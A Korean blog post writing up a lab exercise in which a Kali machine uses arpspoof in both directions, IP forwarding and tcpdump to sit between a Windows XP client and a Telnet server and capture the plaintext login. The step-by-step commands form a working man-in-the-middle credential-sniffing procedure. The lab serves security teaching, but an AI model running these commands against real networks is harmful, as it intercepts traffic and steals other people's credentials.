Infra & Security Eng/Network & Security
ARP 스푸핑을 이용한 Telnet 평문 패킷 스니핑 및 계정 탈취 분석
엔지니어 E
2026. 3. 11. 17:55
반응형

| 실습 네트워크 구성 Windows XP (Client): 192.168.11.7 (Telnet 접속 시도자) Telnet Server: 192.168.11.17 (서비스 제공자, 계정 생성 대상) Kali Linux (Attacker): 192.168.11.36 (패킷 스니핑 수행) 실습 목적 ** ARP 스푸핑(ARP Spoofing)**을 이용해 중간자 공격(MITM)을 수행하고, 암호화되지 않은 Telnet 평문 패킷을 스니핑하여 계정 정보를 탈취하는 과정을 다룬다 |
사전 작업
![]() 네트워크 인터페이스 카드(NIC)를 프러미스큐어스(Promiscuous) 모드로 설정하여, 목적지 주소가 본인이 아닌 패킷까지 모두 수신할 수 있도록 활성화함 # ip ad show eth0 으로 먼저 사전 확인 # ip link set dev eth0 promisc on 으로 프러미스큐어스 모드 활성화하기 |
| 텔넷 서버(192.168.11.17) 1. 서비스 설치 및 시작, 계정 생성하기 # dnf install -y telnet-server telnet # systemctl enable --now telnet.socket # useradd st15 # passwd st15 * systemctl stop firewalld - 방화벽 해제 하기 2. 공격자 서버(192.168.11.36) 1) 터미널1 (패킷 포워딩) ![]() # sysctl -w net.ipv4.ip_forward=1 2. 터미널 2(ARP Spoofing) - XP(7번)를 속여 패킷이 공격자 서버로 오게 만든다 ![]() # arpspoof -i eth0 -t 192.168.11.7 192.168.11.17 3. 터미널 3 - 서버(17번)를 속여 응답 패킷이 공격자 서버로 오게 만든다 # arpspoof -i eth0 -t 192.168.11.17 192.168.11.7 4. 터미널 4(패킷 스니핑) - 데이터를 파일에 기록 # tcpdump -xX -i eth0 tcp port 23 and host 192.168.11.17 > 11.17 - 데이터를 갈취하여 11.17 이라는 파일에 넣는 명령어 5. 윈도우xp 명령 프롬프트에서 로그인 아이디: st15 / 비밀번호 st15 6. 저장된 파일 확인하기 # cat 11.17 명령어로 파일 확인 ![]() ![]() ![]() ![]() |






